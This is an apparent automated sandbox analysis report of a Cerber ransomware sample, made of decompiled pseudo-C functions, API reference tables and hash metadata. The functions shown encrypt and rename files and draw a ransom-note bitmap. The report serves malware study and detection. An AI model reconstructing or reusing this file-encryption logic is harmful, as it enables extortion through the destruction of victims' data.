							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t192);
						}
						__eflags = _t229 & 0x00000800;
						if((_t229 & 0x00000800) != 0) {
							_t189 = E0040591C(0x40d098, 2, 0xc1c7544c);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t189);
						}
						__eflags = _t229 & 0x00001000;
						if((_t229 & 0x00001000) != 0) {
							_t186 = E0040591C(0x40d09c, 2, 0xb97bfa77);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t186);
						}
						_t243 = 0x2000;
						__eflags = 0x00002000 & _t229;
						if((0x00002000 & _t229) != 0) {
							_t183 = E0040591C(0x40d0a0, 6, 0x7863e9f7);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t183);
						}
						__eflags = _t229 & 0x00004000;
						if((_t229 & 0x00004000) != 0) {
							_t180 = E0040591C(0x40d0a8, 2, 0x9f4e4ac2);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t180);
						}
						__eflags = _t229 & 0x00010000;
						if((_t229 & 0x00010000) != 0) {
							_t177 = E0040591C(0x40d0ac, 2, 0x1d2b18be);
							_t259 = _t259 + 0xc;
							StrCatW( &_v1556, _t177);
						}
						_t167 = lstrlenW( &_v1556);
						_push(0x32);
						 *((short*)(_t259 + 0x10a + _t167 * 2)) = 0;
						StrFormatByteSizeW(_v1788, _v1784,  &_v1660);
						_push( &_v1564);
						_push( &_v1668);
						_push( &_v1748);
						_push( &_v1708);
						_push(_v1816);
						_push(_v1808);
						_push(E0040591C(0x40d0b0, 0x56, 0x2c86bbcb));
						_push( *_a4);
						E00402B9B(_t229, _t235, _t243, _t252);
						_t257 = _t259 + 0x2c;
					}
					__eflags =  *0x42f79e;
					if( *0x42f79e != 0) {
						__eflags = _t243 & _t229;
						if((_t243 & _t229) == 0) {
							_t229 = _t229 | _t243;
							__eflags = _t229;
							SetFileAttributesW(_v1808, _t229);
						}
						_t244 = GetTickCount();
						_t138 = E00401A5B(_v1804, _t235, _v1808,  &_v532, _v1776, _v1792, _v1796);
						_t257 = _t257 + 0x14;
						__eflags = _t138;
						if(_t138 != 0) {
							_t140 = GetTickCount() - _t244;
							__eflags = _t140;
							_push(_t140);
							_push(_v1808);
							_push(_v1800);
							_push(E0040591C(0x40d108, 0x29, 0xbfade95f));
							_push( *_a4);
							E00402B9B(_t229, _t235, _t244, _t252);
							_t257 = _t257 + 0x20;
							E004090F6(0, _t235, _t244, _t252, __eflags,  &_v532);
						}
					}
					_t230 =  *0x42f7b4 & 0x0000ffff;
					_t131 = _v1804 + 0x17;
					__eflags = _t131;
					memset(_t131, 0, ( *0x42f7a4 & 0x0000ffff) + ( *0x42f7b4 & 0x0000ffff));
					_t257 = _t257 + 0xc;
					E00405463(_t252);
					E00405463(_v1808);
				}
				goto L50;
			}

0x00401eb2
0x00401eb8
0x00401ed0
0x00401ed4
0x00401ed9
0x00401edb
0x00401ee1
0x0040242f
0x00402435
0x00402435
0x00401eee
0x00401ef3
0x00401ef9
0x00402428
0x0040242a
0x00000000
0x0040242a
0x00401f05
0x00401f0a
0x00401f10
0x0040241f
0x00402423
0x00000000
0x00402423
0x00401f18
0x00401f1c
0x00401f22
0x00401f28
0x004023f5
0x00401f31
0x00401f39
0x00401f3b
0x00401f3d
0x00402412
0x00402416
0x0040241b
0x00000000
0x0040241b
0x00401f50
0x00401f52
0x00401f56
0x00401f58
0x0040240d
0x00000000
0x0040240d
0x00401f5e
0x00401f63
0x00401f6f
0x00401f73
0x00401f79
0x00401f80
0x00401f85
0x00401f86
0x00401f88
0x00402330
0x00401f8e
0x00401f8e
0x00401fa9
0x00401fb0
0x00401fb2
0x00401fb5
0x00401fbd
0x00401fc4
0x00401fc4
0x00401fcd
0x00401fd4
0x00401fe2
0x00401ff2
0x0040200e
0x00402025
0x00402033
0x00402043
0x00402048
0x0040204b
0x0040204e
0x0040205c
0x00402061
0x0040206d
0x0040206d
0x00402073
0x00402076
0x00402084
0x00402089
0x00402095
0x00402095
0x0040209b
0x0040209e
0x004020ac
0x004020b1
0x004020bd
0x004020bd
0x004020c3
0x004020c6
0x004020d4
0x004020d9
0x004020e5
0x004020e5
0x004020eb
0x004020ee
0x004020fc
0x00402101
0x0040210d
0x0040210d
0x00402113
0x00402116
0x00402124
0x00402129
0x00402135
0x00402135
0x0040213b
0x0040213d
0x0040214b
0x00402150
0x0040215c
0x0040215c
0x00402162
0x00402168
0x00402176
0x0040217b
0x00402187
0x00402187
0x0040218d
0x00402193
0x004021a1
0x004021a6
0x004021b2
0x004021b2
0x004021b8
0x004021ba
0x004021c8
0x004021cd
0x004021d9
0x004021d9
0x004021df
0x004021e5
0x004021f3
0x004021f8
0x00402204
0x00402204
0x0040220a
0x00402210
0x0040221e
0x00402223
0x0040222f
0x0040222f
0x00402235
0x0040223a
0x0040223c
0x0040224a
0x0040224f
0x0040225b
0x0040225b
0x00402261
0x00402267
0x00402275
0x0040227a
0x00402286
0x00402286
0x0040228c
0x00402292
0x004022a0
0x004022a5
0x004022b1
0x004022b1
0x004022bf
0x004022c7
0x004022c9
0x004022e1
0x004022ee
0x004022f6
0x004022fb
0x00402303
0x00402304
0x00402308
0x00402320
0x00402324
0x00402326
0x0040232b
0x0040232b
0x00402335
0x0040233c
0x00402342
0x00402344
0x00402346
0x00402346
0x0040234d
0x0040234d
0x0040235d
0x00402377
0x0040237c
0x0040237f
0x00402381
0x00402389
0x00402389
0x0040238b
0x0040238c
0x00402390
0x004023a8
0x004023ac
0x004023ae
0x004023b3
0x004023be
0x004023c3
0x00402381
0x004023c4
0x004023d9
0x004023d9
0x004023df
0x004023e4
0x004023e7
0x004023f0
0x004023f0
0x00000000

APIs

GetCurrentThreadId.KERNEL32 ref: 00401EC1
StrCpyNW.SHLWAPI(?,00000000,?), ref: 00401F73
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401FAA
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00401FBD
CloseHandle.KERNEL32(00000000), ref: 00401FC4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00401FE2
FileTimeToSystemTime.KERNEL32(?,?), ref: 00401FF2
GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000014), ref: 0040200E
GetTimeFormatW.KERNEL32(00000400,00000008,?,00000000,?,00000014), ref: 00402025
memset.NTDLL ref: 00402043

Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1

WaitForSingleObject.KERNEL32(0000000F), ref: 004023FD

Strings

0jt, xrefs: 00402353, 00402383

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: FileTime$ErrorFormatLast$CloseCreateCurrentDateFreeHandleHeapLocalObjectSingleSizeSystemThreadWaitmemset
String ID: 0jt
API String ID: 1876243802-1607594887
Opcode ID: 2ddaeaa363e22ee9e12f8f6aa2a1735278c64dce303052f09d8db391096982a9
Instruction ID: 1b53b1905552076a97b2969ddcceb8c8da28030c795c23ffefdbb6d86413ff05
Opcode Fuzzy Hash: 2ddaeaa363e22ee9e12f8f6aa2a1735278c64dce303052f09d8db391096982a9
Instruction Fuzzy Hash: E6D1CA72544301ABD320AFA1DD49F9F77ACEF44704F04483AF684F61D2E77899198B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004086CF Relevance: 34.8, APIs: 23, Instructions: 253
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004086CF(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v5;
				signed int _v12;
				int _v16;
				signed int _v20;
				CHAR* _v24;
				void* _v28;
				signed int _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				struct HDC__* _v48;
				struct tagRECT _v64;
				struct tagRECT _v80;
				void* __edi;
				void* __esi;
				signed int _t63;
				void* _t68;
				CHAR* _t70;
				int _t75;
				void* _t76;
				int _t79;
				signed int _t84;
				void* _t86;
				signed int _t105;
				signed int _t106;
				signed char _t126;
				signed char _t128;
				int _t132;
				void* _t137;
				void* _t138;
				signed int _t143;
				signed int _t148;
				struct HDC__* _t150;
				struct HDC__* _t151;
				int _t157;

				_v5 = 0;
				_t63 = E004031AF(_a4, __eflags, E00405905(0x40d738, 9, 0xf223c378));
				_pop(_t137);
				_v12 = _t63;
				_t172 = _t63;
				if(_t63 != 0) {
					_push( &_v48);
					_t68 = E004031AF(_v12, _t172, E00405905(0x40d514, 4, 0x22a8cdeb));
					_t138 = _t137;
					_t70 = E004078F0(E004032B8(_t68, _t172), _t138, __edx);
					_v24 = _t70;
					if(_t70 != 0) {
						_t151 = GetDC(0);
						_v48 = _t151;
						if(_t151 != 0) {
							_t150 = CreateCompatibleDC(_t151);
							if(_t150 != 0) {
								_v16 = GetDeviceCaps(_t151, 8);
								_t75 = GetDeviceCaps(_t151, 0xa);
								_v20 = _t75;
								_t76 = CreateCompatibleBitmap(_t151, _v16, _t75);
								_v28 = _t76;
								_t176 = _t76;
								if(_t76 != 0) {
									_v44 = SelectObject(_t150, _t76);
									_t79 = GetDeviceCaps(_t151, 0x5a);
									_t84 = MulDiv(E00403253(E004031AF(_v12, _t176, E00405905( &E0040D744, 4, 0x149d4cf6)), _t176), _t79, 0x48);
									_t86 = CreateFontW( ~_t84, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, E0040591C(0x40d74c, 8, 0xaf2a2560));
									_v40 = _t86;
									_t177 = _t86;
									if(_t86 != 0) {
										_v36 = SelectObject(_t150, _t86);
										SetBkColor(_t150, E00403253(E004031AF(_v12, _t177, E00405905(0x40d758, 0xa, 0xac908572)), _t177));
										SetTextColor(_t150, E00403253(E004031AF(_v12, _t177, E00405905(0x40d764, 5, 0xb1a3f726)), _t177));
										_t157 = _v16;
										_v64.left = 0;
										_v64.top = 0;
										_v64.right = _t157;
										_v64.bottom = _v20;
										FillRect(_t150,  &_v64, GetStockObject(2));
										_t105 = _v20 * _t157;
										_t143 = 0xa;
										_t106 = _t105 / _t143;
										_t148 = _t105 % _t143;
										if(_t106 > 0) {
											_v12 = _t106;
											do {
												_v32 = (E004063E1(0xff) & 0x000000ff) << 8;
												_t126 = E004063E1(0xff);
												_t128 = E004063E1(0xff);
												_t132 = E004063E1(_v64.bottom);
												SetPixel(_t150, E004063E1(_v64.right), _t132, _t128 & 0x000000ff | (_t126 & 0x000000ff | _v32) << 0x00000008);
												_t35 =  &_v12;
												 *_t35 = _v12 - 1;
											} while ( *_t35 != 0);
											_t157 = _v16;
										}
										_v80.bottom = _v20;
										_v80.left = 0;
										_v80.top = 0;
										_v80.right = _t157;
										DrawTextA(_t150, _v24, 0xffffffff,  &_v80, 0x411);
										asm("cdq");
										asm("cdq");
										_v64.top = (_v64.bottom - _t148 >> 1) - (_v80.bottom - _t148 >> 1);
										DrawTextA(_t150, _v24, 0xffffffff,  &_v64, 0x11);
										_v5 = E00408485(_v80.bottom - _t148 >> 1, _v28, _a8, _a12, _a16);
										SelectObject(_t150, _v36);
										DeleteObject(_v40);
									}
									SelectObject(_t150, _v44);
									DeleteObject(_v28);
									_t151 = _v48;
								}
								DeleteDC(_t150);
							}
							ReleaseDC(0, _t151);
						}
					}
				}
				return _v5;
			}

0x004086e6
0x004086f5
0x004086fa
0x004086fb
0x004086fe
0x00408700
0x00408709
0x00408723
0x00408728
0x00408733
0x00408739
0x0040873e
0x0040874b
0x0040874d
0x00408752
0x0040875f
0x00408763
0x00408775
0x00408778
0x00408782
0x00408786
0x0040878c
0x0040878f
0x00408791
0x004087a4
0x004087a7
0x004087d4
0x00408802
0x00408808
0x0040880b
0x0040880d
0x00408827
0x00408845
0x00408872
0x0040887b
0x00408880
0x00408883
0x00408886
0x00408889
0x00408898
0x004088a1
0x004088a8
0x004088a9
0x004088a9
0x004088ad
0x004088af
0x004088b2
0x004088c4
0x004088c9
0x004088dc
0x004088ea
0x004088fa
0x00408900
0x00408900
0x00408900
0x00408905
0x00408905
0x00408910
0x0040891c
0x00408920
0x00408923
0x00408926
0x0040892f
0x00408937
0x00408942
0x0040894f
0x0040896c
0x00408970
0x00408979
0x00408979
0x00408983
0x0040898c
0x00408992
0x00408992
0x00408996
0x00408996
0x0040899e
0x0040899e
0x00408752
0x0040873e
0x004089ab

APIs

Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6

Part of subcall function 004078F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 004078FF
Part of subcall function 004078F0: StrCmpNIA.SHLWAPI(00000000,00000000,?,?,0000000A), ref: 00407938

GetDC.USER32(00000000), ref: 00408745
CreateCompatibleDC.GDI32(00000000), ref: 00408759
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040876C
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408778
CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00408786
SelectObject.GDI32(00000000,00000000), ref: 00408799
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004087A7
MulDiv.KERNEL32(00000000), ref: 004087D4
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 00408802
SelectObject.GDI32(00000000,00000000), ref: 00408815
SetBkColor.GDI32(00000000,00000000), ref: 00408845
SetTextColor.GDI32(00000000,00000000), ref: 00408872
GetStockObject.GDI32(00000002), ref: 0040888C
FillRect.USER32(00000000,?,00000000), ref: 00408898
SetPixel.GDI32(00000000,00000000,00000000,?), ref: 004088FA
DrawTextA.USER32(00000000,00000000,000000FF,?,00000411), ref: 00408926
DrawTextA.USER32(00000000,00000000,000000FF,?,00000011), ref: 0040894F
SelectObject.GDI32(00000000,?), ref: 00408970
DeleteObject.GDI32(?), ref: 00408979
SelectObject.GDI32(00000000,?), ref: 00408983
DeleteObject.GDI32(?), ref: 0040898C
DeleteDC.GDI32(00000000), ref: 00408996
ReleaseDC.USER32(00000000,00000000), ref: 0040899E

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: Object$Select$CapsCreateDeleteDeviceText$ColorCompatibleDraw$BitmapFillFontPixelRectReleaseStocklstrcmpilstrlen
String ID:
API String ID: 3678731151-0
Opcode ID: d76828802d53ad9390a58e71894fa75d68f2871c06736e27ec4a87b76ab4e022
Instruction ID: ef1943a7f34fee3139141099a9e207c1e29f1f4870d14a52305c2a9e29fd8a02
Opcode Fuzzy Hash: d76828802d53ad9390a58e71894fa75d68f2871c06736e27ec4a87b76ab4e022
Instruction Fuzzy Hash: 738182B1D00218BFDB11AFA5DD459AE7BB8EF48715F01403AF905F72D1DA3849058B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401A5B Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 350
filestringtimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401A5B(void* __eax, long __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12, void* _a16, intOrPtr _a20) {
				signed char _v9;
				char _v10;
				signed int _v16;
				void* _v20;
				long _v24;
				signed int* _v28;
				long _v32;
				void* _v36;
				struct _OVERLAPPED* _v40;
				long _v44;
				long _v48;
				void* _v52;
				void* _v56;
				long _v60;
				signed int _v64;
				intOrPtr _v68;
				signed short _v72;
				struct _FILETIME _v80;
				struct _FILETIME _v88;
				struct _FILETIME _v96;
				signed int _v100;
				char _v126;
				char _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t141;
				void* _t156;
				intOrPtr _t160;
				struct _OVERLAPPED** _t161;
				long _t169;
				short _t173;
				long _t191;
				void* _t193;
				signed int _t200;
				void* _t223;
				void* _t225;
				void* _t226;
				void* _t228;
				signed short _t229;
				intOrPtr* _t238;
				long _t242;
				long _t243;
				long _t247;
				signed short _t251;
				void* _t254;
				void* _t256;
				struct _OVERLAPPED* _t259;
				void* _t265;
				void* _t268;
				void* _t276;
				void* _t277;
				void* _t281;
				void* _t283;

				_t243 = __edx;
				_t259 = 0;
				_t225 = __eax;
				_v16 = 0;
				_v10 = 0;
				_t141 = CreateFileW(_a4, 0xc0000000, 0, 0, 3, 0, 0);
				_v20 = _t141;
				if(_t141 == 0xffffffff) {
					L31:
					return _v10;
				}
				_t227 =  &_v72;
				 *0x40f214(_t141,  &_v72);
				_t276 = _v68 -  *0x42f7ac; // 0x0
				if(_t276 < 0) {
					L27:
					CloseHandle(_v20);
					if(_v16 != _t259) {
						if(_v10 != 0) {
							_v10 = MoveFileW(_a4, _v16) != 0;
						}
						E00405463(_v16);
					}
					goto L31;
				}
				if(_t276 > 0) {
					L4:
					_push(8);
					_v28 = E004053BD(_t227);
					_v128 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					E00405D99(_t227, _t243,  &_v128, 0xb, 0xf);
					_push("955c");
					_push( &_v128);
					_push(_a8);
					_push(E0040591C(0x40d064, 8, 0xf9a13d54));
					_push( &_v16);
					E00405B0C(_t225, _t227,  &_v126, _t259, _t277);
					_t268 = _t265 + 0x2c;
					_t156 = E00404EA5(_v16);
					_pop(_t228);
					_t278 = _t156;
					if(_t156 == 0) {
						L7:
						_t229 = _v72;
						asm("cdq");
						_v64 =  *0x42f7b4 & 0x0000ffff;
						_v60 = _t243;
						_v96.dwLowDateTime = _t229 - 0x42f7c0->LowPart;
						_t160 = _v68;
						asm("sbb edx, [0x42f7c4]");
						_v9 = 0;
						_v24 = _t259;
						_t281 = _t160 - _v60;
						if(_t281 < 0 || _t281 <= 0 && _v96.dwLowDateTime <= _v64) {
							_t251 = _t229 & 0x0000ffff;
						} else {
							_t247 =  *0x42f7b8; // 0x4000000
							asm("sbb eax, [ebp-0x38]");
							_t242 = _t229 - _v64 - 0x42f7c0->LowPart;
							_t251 =  *0x42f7b4 & 0x0000ffff;
							asm("sbb eax, [0x42f7c4]");
							_v24 = _t247;
							_t283 = _t160 - _t259;
							if(_t283 <= 0 && (_t283 < 0 || _t242 < _t247)) {
								_v24 = _t242;
							}
							_v9 = 1;
						}
						_t161 = _v28;
						if(_t161 != _t259 || _v9 == 0) {
							if(_v9 != 0) {
								 *_t161 = _t259;
							}
							GetFileTime(_v20,  &_v80,  &_v88,  &_v96);
							_push(_t259);
							_v36 = ( *0x42f7a4 & 0x0000ffff) + _t225 + 0x17;
							SetFilePointerEx(_v20, 0x42f7c0->LowPart,  *0x42f7c4, _t259);
							_t169 = _t251 & 0x0000ffff;
							_v32 = _t169;
							ReadFile(_v20, _v36, _t169,  &_v60, _t259);
							 *((char*)(_t225 + 8)) = _v9;
							 *((intOrPtr*)(_t225 + 9)) = _v24;
							_t173 = 0x42f7c0->LowPart; // 0x708
							 *((short*)(_t225 + 0xf)) = _t173;
							 *(_t225 + 6) = lstrlenW(_a12) + _t174;
							 *(_t225 + 0xd) = _t251;
							 *((intOrPtr*)(_t225 + 0x11)) = E0040AF39( &_v60, _v32);
							_v36 = _t225 + 0x17;
							E00404B6E(_t225 + 0x17,  *0x42f7a4 & 0x0000ffff);
							_t233 =  *(_t225 + 6) & 0x0000ffff;
							_v44 = ( *(_t225 + 6) & 0x0000ffff) + 0x18 + (_v9 & 0x000000ff) * 8;
							_t254 = E004053BD( *(_t225 + 6) & 0x0000ffff);
							_v52 = _t254;
							_t288 = _t254 - _t259;
							if(_t254 != _t259) {
								 *((intOrPtr*)(_t254 + 4)) = _v80.dwHighDateTime;
								 *_t254 = _v80.dwLowDateTime;
								 *((intOrPtr*)(_t254 + 0xc)) = _v88.dwHighDateTime;
								 *(_t254 + 8) = _v88.dwLowDateTime;
								 *((intOrPtr*)(_t254 + 0x14)) = _v96.dwHighDateTime;
								 *(_t254 + 0x10) = _v96.dwLowDateTime;
								_t88 = _t254 + 0x18; // 0x18
								memcpy(_t88, _a12,  *(_t225 + 6) & 0x0000ffff);
								_t191 =  *0x42f794; // 0x63
								_v48 = _t191;
								_t193 = E0040B283(_t233, _t288,  *0x42f7bc, _t225,  &_v48);
								_v56 = _t193;
								if(_t193 != _t259) {
									_v100 = _v100 & 0x00000000;
									asm("cdq");
									asm("adc eax, edx");
									asm("adc eax, [0x42f7c4]");
									if(E0040194B(_v20, _v36, _v24, _a20, _v28,  *_v28 * _v24 + _v32 + 0x42f7c0->LowPart, _v100) != 0) {
										_t200 =  *(_t225 + 6) & 0x0000ffff;
										_t238 = _v28;
										 *((intOrPtr*)(_t254 + 0x18 + _t200)) =  *_t238;
										 *((intOrPtr*)(_t200 + _t254 + 0x1c)) =  *((intOrPtr*)(_t238 + 4));
										E0040AFFE( *0x42f7a4 & 0x0000ffff, _v44, _v36, _t254, _t259);
										_t226 = _v20;
										_push(_t259);
										SetFilePointerEx(_t226,  *0x42f7c0,  *0x42f7c4, _t259);
										_t256 = _a16;
										E00404B6E(_t256, _v32);
										WriteFile(_t226, _t256, _v32,  &_v24, _t259);
										_push(2);
										_v40 = _t259;
										asm("stosd");
										_t120 =  &_v40; // 0x40237c
										SetFilePointerEx(_t226,  *_t120, _v36, _t259);
										WriteFile(_t226, _v52, _v44,  &_v24, _t259);
										WriteFile(_t226, _v56, _v48,  &_v24, _t259);
										WriteFile(_t226,  *0x42f7b0,  *0x42f7a0,  &_v24, _t259);
										_t254 = _v52;
										_v10 = 1;
									}
									E00405463(_v56);
								}
								E00405463(_t254);
							}
						}
						E00405463(_v28);
						_t259 = 0;
						goto L27;
					} else {
						goto L5;
					}
					goto L7;
					L5:
					E00405463(_v16);
					_v16 = _v16 & 0x00000000;
					_v128 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					E00405D99(_t228, _t243,  &_v128, 0xb, 0xf);
					_push("955c");
					_push( &_v128);
					_push(_a8);
					_push(E0040591C(0x40d064, 8, 0xf9a13d54));
					_push( &_v16);
					E00405B0C(_t225, _t228,  &_v126, _v16, _t278);
					_t268 = _t268 + 0x2c;
					_t223 = E00404EA5(_v16);
					_pop(_t228);
					if(_t223 != 0) {
						goto L5;
					} else {
						_t259 = 0;
						goto L7;
					}
				}
				_t277 = _v72 -  *0x42f7a8; // 0x800
				if(_t277 < 0) {
					goto L27;
				}
				goto L4;
			}

0x00401a5b
0x00401a67
0x00401a77
0x00401a79
0x00401a7c
0x00401a80
0x00401a86
0x00401a8c
0x00401e7b
0x00401e82
0x00401e82
0x00401a92
0x00401a97
0x00401aa0
0x00401aa6
0x00401e4d
0x00401e50
0x00401e59
0x00401e5f
0x00401e6f
0x00401e6f
0x00401e76
0x00401e76
0x00000000
0x00401e59
0x00401aac
0x00401abd
0x00401abd
0x00401ac5
0x00401aca
0x00401ad1
0x00401ad2
0x00401ad3
0x00401ad4
0x00401ad5
0x00401ad8
0x00401ae0
0x00401ae8
0x00401af0
0x00401af1
0x00401b08
0x00401b0c
0x00401b0d
0x00401b12
0x00401b18
0x00401b1d
0x00401b1e
0x00401b20
0x00401b8a
0x00401b91
0x00401b94
0x00401b95
0x00401ba0
0x00401ba3
0x00401ba6
0x00401bab
0x00401bb1
0x00401bb5
0x00401bb8
0x00401bbb
0x00401bfc
0x00401bc7
0x00401bca
0x00401bd0
0x00401bd3
0x00401bd9
0x00401be0
0x00401be6
0x00401be9
0x00401beb
0x00401bf3
0x00401bf3
0x00401bf6
0x00401bf6
0x00401bff
0x00401c04
0x00401c14
0x00401c16
0x00401c16
0x00401c27
0x00401c34
0x00401c46
0x00401c4c
0x00401c53
0x00401c5e
0x00401c64
0x00401c70
0x00401c76
0x00401c79
0x00401c7f
0x00401c91
0x00401c95
0x00401c9e
0x00401cad
0x00401cb0
0x00401cba
0x00401cc2
0x00401cca
0x00401ccc
0x00401ccf
0x00401cd1
0x00401cda
0x00401ce0
0x00401ce5
0x00401ceb
0x00401cf1
0x00401cf7
0x00401d02
0x00401d06
0x00401d0b
0x00401d13
0x00401d21
0x00401d29
0x00401d2e
0x00401d40
0x00401d44
0x00401d4a
0x00401d52
0x00401d73
0x00401d79
0x00401d7d
0x00401d82
0x00401d8a
0x00401d9c
0x00401da1
0x00401da7
0x00401db6
0x00401dbf
0x00401dc2
0x00401dd2
0x00401dd8
0x00401ddd
0x00401de3
0x00401de7
0x00401deb
0x00401dfd
0x00401e0f
0x00401e27
0x00401e2d
0x00401e30
0x00401e30
0x00401e37
0x00401e37
0x00401e3e
0x00401e3e
0x00401cd1
0x00401e46
0x00401e4b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b22
0x00401b25
0x00401b2c
0x00401b30
0x00401b37
0x00401b38
0x00401b39
0x00401b3a
0x00401b3b
0x00401b3e
0x00401b46
0x00401b4e
0x00401b56
0x00401b57
0x00401b6e
0x00401b72
0x00401b73
0x00401b78
0x00401b7e
0x00401b83
0x00401b86
0x00000000
0x00401b88
0x00401b88
0x00000000
0x00401b88
0x00401b86
0x00401ab1
0x00401ab7
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?), ref: 00401A80
GetFileSizeEx.KERNEL32(00000000,?), ref: 00401A97
GetFileTime.KERNEL32(?,?,?,?), ref: 00401C27
SetFilePointerEx.KERNEL32(?,00000000,00000000), ref: 00401C4C
ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00401C64
lstrlenW.KERNEL32(?), ref: 00401C83
memcpy.NTDLL(00000018,?,?), ref: 00401D06
SetFilePointerEx.KERNEL32(?,00000000,00000000), ref: 00401DB6
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401DD2
SetFilePointerEx.KERNEL32(?,|#@,?,00000000,00000002), ref: 00401DEB
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401DFD
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401E0F
WriteFile.KERNEL32(?,?,00000000), ref: 00401E27
CloseHandle.KERNEL32(?), ref: 00401E50
MoveFileW.KERNEL32(?,?), ref: 00401E67

Strings

955c, xrefs: 00401AE8, 00401B4E
|#@, xrefs: 00401DE7

Memory Dump Source

Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: File$Write$Pointer$CloseCreateHandleMoveReadSizeTimelstrlenmemcpy
String ID: 955c$|#@
API String ID: 2810646288-890247653
Opcode ID: a55abf723c6de856641295b72b9cf681b56941c3cd29c50f46336b521459b712
Instruction ID: 03c0d9b36c0c9c4c583867d549d6c9e758735e5455f2e97db342a84e4f9e9e08
Opcode Fuzzy Hash: a55abf723c6de856641295b72b9cf681b56941c3cd29c50f46336b521459b712
Instruction Fuzzy Hash: 04D13776D00118AFCB11DFA4DD45AAEBBB9FF48700F50407AF900B72A1D735A955CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402438 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00402438(char __ebx, void* __edx, char _a4) {
				intOrPtr _v12;
				char _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t14;
				signed int _t19;
				char _t38;
				signed int _t39;
				void* _t41;
				void* _t44;
				void* _t45;
				void* _t46;
				signed int _t47;
				void* _t48;
				void* _t49;
				long _t50;
				void* _t52;
				void* _t53;
				void* _t54;

				_t44 = __edx;
				_t38 = __ebx;
				_t39 = 7;
				_t45 =  &_v36;
				memset(_t45, 0, _t39 << 2);
				_t54 = _t53 + 0xc;
				_t46 = _t45 + _t39;
				_t3 =  &_a4; // 0x40666c
				_v40 = __ebx;
				_v12 =  *_t3;
				_t14 = E00402C54(_t44, __ebx);
				_pop(_t41);
				if(_t14 != 0) {
					E00404CDC();
					_a4 = GetTickCount();
					_push(E0040591C(0x40d134, 0x14, 0xa9527bfc));
					_push(__ebx);
					E00402C20(__ebx, _t44, _t46, _t48);
					_t54 = _t54 + 0x14;
				}
				_t49 = E0040622D(_t38, _t41);
				 *0x40f1d8( &_v36);
				_t19 = 1;
				if( *0x42f79c != 0) {
					_t19 = E00405FF0() *  *0x42f798;
				}
				if(_t19 != 0) {
					_t47 = _t19;
					do {
						E00406309(_t49, _t41, _t52, E00401EB2,  &_v40);
						_t47 = _t47 - 1;
						_pop(_t41);
					} while (_t47 != 0);
				}
				E0040630E(_t49);
				E0040634B(_t49, _t38);
				_t50 = GetTickCount();
				if(E00402C54(_t44, _t38) != 0) {
					_t9 =  &_a4; // 0x40666c
